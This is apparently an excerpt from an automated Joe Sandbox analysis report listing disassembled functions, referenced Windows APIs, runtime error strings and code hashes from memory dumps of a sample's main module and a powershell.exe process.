Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: f5f33d205d2fad210f3e0d1ec9ee54f13a80ba1a30a4d16dfae315e545ed93b8
Instruction ID: 5657d36c5b29a980335f34319dfaf426f818c3f397baf49920d0aaa375328495
Opcode Fuzzy Hash: f5f33d205d2fad210f3e0d1ec9ee54f13a80ba1a30a4d16dfae315e545ed93b8
Instruction Fuzzy Hash: E6F18D66A08A8685DB50EB2AE44427EE365FBC4BE4F844132EE6D077E4DF6CD501C3B1

Function 00007FF7FE99E720 Relevance: 5.4, APIs: 4, Instructions: 351stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE99E798

Part of subcall function 00007FF7FE914BE0: memcpy.MSVCRT ref: 00007FF7FE914C15

strlen.MSVCRT ref: 00007FF7FE99E820
strlen.MSVCRT ref: 00007FF7FE99E8A3
strlen.MSVCRT ref: 00007FF7FE99E927

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 7476d36266e89b8702939434a9f25cd311bc0fb50e1e94a734493c3bb1e9acdb
Instruction ID: fe3e3ab1293c4190461e89f2e78669bb3244cda98c665e3cd63b5f399f1731ad
Opcode Fuzzy Hash: 7476d36266e89b8702939434a9f25cd311bc0fb50e1e94a734493c3bb1e9acdb
Instruction Fuzzy Hash: 9CF1C462A08B8685DB50EB1AD88026EA3A5FBC4BD4F844532EE6D077D4DF7CD501C3B1

Function 00007FF7FE913700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 00007FF7FE91374C
LocalFree.KERNEL32 ref: 00007FF7FE913784

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE913801

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: basic_string: construction from null is not valid
API String ID: 1427518018-2991274800
Opcode ID: d119d8d36cd833152f7d5fe61d852987ed80a91aa7dadcb908b9579a50435cd6
Instruction ID: e9e75dacd5c0619d0bd5ae3dd0456b4934f4e830c65793ecc2945287eeed6efc
Opcode Fuzzy Hash: d119d8d36cd833152f7d5fe61d852987ed80a91aa7dadcb908b9579a50435cd6
Instruction Fuzzy Hash: 13318F62A19B4285FB10FB29E84026EB3B0BBC5B90FD44135DA6D077D4DF3CD44587A2

Function 00007FF7FE90C7D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE90C8A8

Strings

%p not found?!?!, xrefs: 00007FF7FE90C89E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: %p not found?!?!
API String ID: 383729395-11085004
Opcode ID: b65544ddb47bb248de66c359c141b628e2c5c42cf3651cf4b0d6d94e6296cdd7
Instruction ID: 492ab39eb3fb5ba92e6ee96176310a279154d8e442724d31d68e50ff3ba76a40
Opcode Fuzzy Hash: b65544ddb47bb248de66c359c141b628e2c5c42cf3651cf4b0d6d94e6296cdd7
Instruction Fuzzy Hash: B9114F22E4A60281EB29FB7595412BC9290AFC8BD4FC91434CF2D067D0EE6CE58193F7

Function 00007FF7FE900690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7FE9006C0
TerminateProcess.KERNEL32 ref: 00007FF7FE9006CE

Strings

*** stack smashing detected ***: terminated, xrefs: 00007FF7FE90069F

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: *** stack smashing detected ***: terminated
API String ID: 2429186680-3581952252
Opcode ID: 96e4ba550d88e91506a6e5117c1ad8b3ce230a920dc68181dc881b4f3f2f0c7a
Instruction ID: aa89a3bddf0e99e3808185b49545c3ab9b31a688c7c5b2161da2e222bf3918a8
Opcode Fuzzy Hash: 96e4ba550d88e91506a6e5117c1ad8b3ce230a920dc68181dc881b4f3f2f0c7a
Instruction Fuzzy Hash: 16014B67E0D38686F715EB245C542786B91AFE6B84F94403AC72D473D2EC9D580287F3

Function 00007FF7FE8FEAF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57
Unknown error, xrefs: 00007FF7FE8FEBDC

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: cec87b2179cf49a415b53cd5b0b32fb382657d7da394c1f2872604e48bb79669
Instruction ID: 22d018cffed992ff5ae7a795edffda0ffa0e390bc31296794d5f08cded020890
Opcode Fuzzy Hash: cec87b2179cf49a415b53cd5b0b32fb382657d7da394c1f2872604e48bb79669
Instruction Fuzzy Hash: 9201A063D08F8482D301EF1C98001BAB330FBAA759F559326EB8C26195DF28E1928750

Function 00007FF7FE8FFED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF7FE8FFF02
abort.MSVCRT ref: 00007FF7FE8FFF17

Strings

CCG , xrefs: 00007FF7FE8FFEFD

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: ExceptionRaiseabort
String ID: CCG
API String ID: 2956646853-1584390748
Opcode ID: c4363ece5457032f1b630bada169c1ef00fda3dac63fe12d2cb1f1edc487ee65
Instruction ID: cfa05ffeb7e45b2d9140623d807426744f333273894683a282131758f301cf45
Opcode Fuzzy Hash: c4363ece5457032f1b630bada169c1ef00fda3dac63fe12d2cb1f1edc487ee65
Instruction Fuzzy Hash: 92016722D24B8186E714AB5494413B96260FFF970CFB0B325E66C052B1DFB9D2F38650

Function 00007FF7FE913850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00007FF7FE91385C
strlen.MSVCRT ref: 00007FF7FE913873

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE913891

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 3fd38ebbdcc3785426857f3cb0fe55d73fbba281f560c3af7dcf89036b3cfd86
Instruction ID: 224be0713e6de748af7a6f9019298538c07e51ac005816225852ea6613b77e2b
Opcode Fuzzy Hash: 3fd38ebbdcc3785426857f3cb0fe55d73fbba281f560c3af7dcf89036b3cfd86
Instruction Fuzzy Hash: 2DE06D52F1A61555AB05FB2AA8110FC9220AFC6B94FC81431DE5D1B7C6ED2CE98783B2

Function 00007FF7FE8FEBB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57
Overflow range error (OVERFLOW), xrefs: 00007FF7FE8FEBB0

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 8af87efc51c3b589d901fde4e499d6427f969d348663e2ecbf9ae6eb5dfc4cea
Instruction ID: 644d33c39ff1115a7805da35bc931ef7a7473dc3539471d653faaf69ed115349
Opcode Fuzzy Hash: 8af87efc51c3b589d901fde4e499d6427f969d348663e2ecbf9ae6eb5dfc4cea
Instruction Fuzzy Hash: 98F04453908E8485D302EF1CA4000AAB370FF9D758F945325EB8D36195DF18E5828760

Function 00007FF7FE8FEBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF7FE8FEBA0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: ee475b7b2e3c2908bdd0540aae1b3a40149c3e91d486639c243262cf9af95166
Instruction ID: 00c28d12f15d6d1f0dcad392cdd32be05d936fbb70c86426d0e21eb4aea0440a
Opcode Fuzzy Hash: ee475b7b2e3c2908bdd0540aae1b3a40149c3e91d486639c243262cf9af95166
Instruction Fuzzy Hash: 59F04F63908E8486D302EF2CA4000AAB370FF9D799F945326EB8D36195DF28E5828760

Function 00007FF7FE8FEBD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57
Total loss of significance (TLOSS), xrefs: 00007FF7FE8FEBD0

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 33f9d25970e88e1fb3f4c383c578ef5e07de39c175e11a2ab973da9acc4baf28
Instruction ID: f5ec84ffbc7daefe70514dda5db129b28d48ea2c8137c648a9b1bd901a81f2f9
Opcode Fuzzy Hash: 33f9d25970e88e1fb3f4c383c578ef5e07de39c175e11a2ab973da9acc4baf28
Instruction Fuzzy Hash: 43F04457908E8481D302EF1C94000AAB360FF9D758F555325DB8D36595DF28E5828760

Function 00007FF7FE8FEBC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF7FE8FEBC0

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: de11a8c509b6889af5ac58963bf332374851f444d5e36f17b67488e8a7e7ed0d
Instruction ID: 22ea5c27ca962ed3f8427cac1ea0f606fe4f3300ab5e28b52d28dbe0dab57d7a
Opcode Fuzzy Hash: de11a8c509b6889af5ac58963bf332374851f444d5e36f17b67488e8a7e7ed0d
Instruction Fuzzy Hash: A2F04453908E8485D302EF2CA4000AAB370FF9D758F945325EB8D36195DF18E5928760

Function 00007FF7FE8FEB90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57
Argument domain error (DOMAIN), xrefs: 00007FF7FE8FEB90

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 1b6a135211ffa1d77d23b5e612f8c3679f3c7bc16a8347f3da90c1c7588c305e
Instruction ID: 37a2781433af29c2eedd6a9c11cebcf8dd42ec5a412ad3339b46ab6e9d33edfa
Opcode Fuzzy Hash: 1b6a135211ffa1d77d23b5e612f8c3679f3c7bc16a8347f3da90c1c7588c305e
Instruction Fuzzy Hash: 43F04453908E8481D302EF1CA4001AAB370FF9D758F545325EB8D36195DF18E5828760

Function 00007FF7FE8FEB28 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE8FEB70

Strings

Argument singularity (SIGN), xrefs: 00007FF7FE8FEB28
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF7FE8FEB57

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 5e6ecbc2cf5032c22aa68f0d6b6325209bdf550a5d8b6357f6b45a8023c1e567
Instruction ID: 97f7647e0c9f08a92661b72dd8b3373f5ba6ee74b1236c4f58e4869c00695c0e
Opcode Fuzzy Hash: 5e6ecbc2cf5032c22aa68f0d6b6325209bdf550a5d8b6357f6b45a8023c1e567
Instruction Fuzzy Hash: A9F06263908E8482D302EF2CA4001ABB360FB9D798F545326EF8C2A155DF28E5828750

Function 00007FF7FE90B0B0 Relevance: 5.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7FE90B0F7
LeaveCriticalSection.KERNEL32 ref: 00007FF7FE90B1A0

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 01a4eab6cb43baa6ebac30f03476a4b64a3e6683bf20627cd76ce63d9777bf3a
Instruction ID: 981b8fac2ed80364d1e93b043a382ba9dbcadd6a91879706195c80ffb06aa53d
Opcode Fuzzy Hash: 01a4eab6cb43baa6ebac30f03476a4b64a3e6683bf20627cd76ce63d9777bf3a
Instruction Fuzzy Hash: EB318A62A0860686EB51EF35D8002A86364EF85B58FD48331DE3E562D4FF38D585C7B2

Function 00007FF7FE90B200 Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7FE90B247
LeaveCriticalSection.KERNEL32 ref: 00007FF7FE90B2CB

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7d149c63bd93d2d903d668bf1b7dd78f7458bcd1c06e0587a6e7980c2efd3224
Instruction ID: 09eba1978c81d4ff70fda202bdbfa9ff5e5007f827e190b5dc9975768039f069
Opcode Fuzzy Hash: 7d149c63bd93d2d903d668bf1b7dd78f7458bcd1c06e0587a6e7980c2efd3224
Instruction Fuzzy Hash: 39212472A0861286EB51DF39950077DA390AB94BA8F844231DF3A462D8EF78D845C7B2

Analysis Process: powershell.exePID: 7460, Parent PID: 384COMMON

Executed Functions

Function 00007FF848CF61F3 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FF848CF6201

Memory Dump Source

Source File: 00000007.00000002.2247238733.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff848cf0000_powershell.jbxd

Similarity

API ID:
String ID: L_^
API String ID: 0-3811526842
Opcode ID: 7b9fd51c41b8ff505e8638f7d3606545930e0c87cc5ef73771b8e8a4368cee43
Instruction ID: f911a00315a0689c08ada7273102a0cc6c7f401f9f262edf527bbce056e8c022
Opcode Fuzzy Hash: 7b9fd51c41b8ff505e8638f7d3606545930e0c87cc5ef73771b8e8a4368cee43
Instruction Fuzzy Hash: 93812857F0C5960EF351F76CB8674F97BA0EFA22B6F1801B7C28C890D3DE15144A82A9

Function 00007FF848CF5E18 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2247238733.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

